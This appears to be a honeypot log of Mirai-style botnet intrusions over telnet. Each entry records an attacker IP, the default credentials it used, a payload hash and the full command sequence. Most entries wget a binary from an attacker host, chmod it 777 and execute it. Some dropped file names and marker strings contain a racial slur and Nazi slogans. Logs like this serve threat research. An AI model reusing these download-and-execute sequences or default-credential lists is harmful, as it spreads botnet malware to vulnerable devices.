IP address User name Password SHA256 of the payload file
 139.59.138.135
sysadm
sysadm
539973d94276095fdd200fe27ad493ada5219785a8724d914a59e98fb4d2d412
enable
system
linuxshell
shell
sh
>/tmp/.misa && cd /tmp/
>/var/.misa && cd /var/
>/dev/.misa && cd /dev/
>/mnt/.misa && cd /mnt/
>/var/run/.misa && cd /var/run/
>/var/tmp/.misa && cd /var/tmp/
>/.misa && cd /
>/dev/netslink/.misa && cd /dev/netslink/
>/dev/shm/.misa && cd /dev/shm/
>/bin/.misa && cd /bin/
>/etc/.misa && cd /etc/
>/boot/.misa && cd /boot/
>/usr/.misa && cd /usr/
/bin/busybox rm -rf HOHO-U79OL HOHO-9Y8G6
/bin/busybox cp /bin/busybox HOHO-U79OL; >HOHO-U79OL; /bin/busybox chmod 777 HOHO-U79OL; /bin/busybox HOHO
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox HOHO
/bin/busybox wget; /bin/busybox tftp; /bin/busybox HOHO
/bin/busybox wget http://104.248.38.142:80/bins/hoho.x86 -O - > HOHO-U79OL; /bin/busybox chmod 777 HOHO-U79OL; /bin/busybox HOHO
./HOHO-U79OL telnet; /bin/busybox BOTNET
/bin/busybox rm -rf HOHO-9Y8G6; >HOHO-U79OL; /bin/busybox HOHO
 128.199.239.225
root
20080826
bf72021b7b918456833d84e439315ec0f2fd14ecc33ba0cbe6d8517bf6e139f2
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf NiGGeR69xd dropper
/bin/busybox cp /bin/busybox NiGGeR69xd; >NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox SORA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA
/bin/busybox wget http://128.199.239.225:80/bins/sora.x86 -O - > NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
./NiGGeR69xd telnet.loader.x86; /bin/busybox BIGREP
/bin/busybox rm -rf dropper; >NiGGeR69xd; /bin/busybox SORA
 176.223.142.43
root
anko
68af241cad03c4bda568789e8c40c1857d158ac96cf0ee32f750576c61b8137b
enable
system
shell
sh
linuxshell
bah
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf 93OfjHZ2z 41JxrNJ6k
/bin/busybox cp /bin/busybox 93OfjHZ2z; >93OfjHZ2z; /bin/busybox chmod 777 93OfjHZ2z; /bin/busybox HEIL
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox HEIL
/bin/busybox wget; /bin/busybox tftp; /bin/busybox HEIL
/bin/busybox wget http://176.223.142.43:80/akbins/spc.akirag -O - > 93OfjHZ2z; /bin/busybox chmod 777 93OfjHZ2z; /bin/busybox HEIL
./93OfjHZ2z telnet; /bin/busybox HITLER
/bin/busybox rm -rf 41JxrNJ6k; >93OfjHZ2z; /bin/busybox HEIL
 134.209.179.123
root
5up
10865f9bdd0b754008521c244fc100e739bcfc403d0f8f9e187a35cad24d63d2
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf freecookiex86 dropper
/bin/busybox cp /bin/busybox freecookiex86; >freecookiex86; /bin/busybox chmod 777 freecookiex86; /bin/busybox SORA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox SORA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA
/bin/busybox wget http://134.209.179.123:80/bins/sora.x86 -O - > freecookiex86; /bin/busybox chmod 777 freecookiex86; /bin/busybox SORA
./freecookiex86 telnet.loader.x86; /bin/busybox BIGREP
/bin/busybox rm -rf dropper; >freecookiex86; /bin/busybox SORA
 54.38.79.86
T.S
54910a8c3ec2f339fefb7bb51303e4aad907aa3f113cd40c5564ab1a617b6f63
sh
..
linuxshell
shell
enable
system
hostname SEFA_ID:0084
/bin/busybox SEFA
/bin/busybox ps; /bin/busybox SEFA
/bin/busybox cat /proc/mounts; /bin/busybox SEFA
/bin/busybox echo -e '\x6b\x61\x6d\x69/proc' > /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/sys' > /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/tmp' > /tmp/.nippon; /bin/busybox cat /tmp/.nippon; /bin/busybox rm /tmp/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/overlay' > /overlay/.nippon; /bin/busybox cat /overlay/.nippon; /bin/busybox rm /overlay/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69' > /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev/pts' > /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/sys/kernel/debug' > /sys/kernel/debug/.nippon; /bin/busybox cat /sys/kernel/debug/.nippon; /bin/busybox rm /sys/kernel/debug/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox SEFA
cd /
/bin/busybox cp /bin/echo sefaexecbi; >sefaexecbi; /bin/busybox chmod 777 sefaexecbi; /bin/busybox SEFA
/bin/busybox cat /bin/echo
/bin/busybox SEFA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SEFA
/bin/busybox wget http://54.38.79.86:80/bins/hoho.ppc -O - > sefaexecbi; /bin/busybox chmod 777 sefaexecbi; /bin/busybox SEFA
./sefaexecbi ppc; /bin/busybox AFES
/bin/busybox SEFA
 68.183.77.151
default
OxhlwSG8
205d4bbbd82fd22117946bf5cfc60669a3c2340da94818d9245e998a484b1ef1
enable
system
linuxshell
shell
sh
>/tmp/.misa && cd /tmp/
>/var/.misa && cd /var/
>/dev/.misa && cd /dev/
>/mnt/.misa && cd /mnt/
>/var/run/.misa && cd /var/run/
>/var/tmp/.misa && cd /var/tmp/
>/.misa && cd /
>/dev/netslink/.misa && cd /dev/netslink/
>/dev/shm/.misa && cd /dev/shm/
>/bin/.misa && cd /bin/
>/etc/.misa && cd /etc/
>/boot/.misa && cd /boot/
>/usr/.misa && cd /usr/
/bin/busybox rm -rf HOHO-U79OL HOHO-9Y8G6
/bin/busybox cp /bin/busybox HOHO-U79OL; >HOHO-U79OL; /bin/busybox chmod 777 HOHO-U79OL; /bin/busybox HOHO
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox HOHO
/bin/busybox wget; /bin/busybox tftp; /bin/busybox HOHO
/bin/busybox wget http://104.248.38.142:80/bins/hoho.sh4 -O - > HOHO-U79OL; /bin/busybox chmod 777 HOHO-U79OL; /bin/busybox HOHO
./HOHO-U79OL telnet; /bin/busybox BOTNET
/bin/busybox rm -rf HOHO-9Y8G6; >HOHO-U79OL; /bin/busybox HOHO
 102.165.37.59
default
OxhlwSG8
3005702158e7c0fa7e02d4b65f74bc87425080e2e6e053a4725075ebdbb8fa1c
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf NiGGeR69xd dropper
/bin/busybox cp /bin/busybox NiGGeR69xd; >NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox SORA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA
/bin/busybox wget http://102.165.37.59:80/bins/sora.spc -O - > NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
./NiGGeR69xd telnet.loader.spc; /bin/busybox BIGREP
/bin/busybox rm -rf dropper; >NiGGeR69xd; /bin/busybox SORA
 102.165.37.59
default
OxhlwSG8
3005702158e7c0fa7e02d4b65f74bc87425080e2e6e053a4725075ebdbb8fa1c
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf NiGGeR69xd dropper
/bin/busybox cp /bin/busybox NiGGeR69xd; >NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox SORA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA
/bin/busybox wget http://102.165.37.59:80/bins/sora.spc -O - > NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
./NiGGeR69xd telnet.loader.spc; /bin/busybox BIGREP
/bin/busybox rm -rf dropper; >NiGGeR69xd; /bin/busybox SORA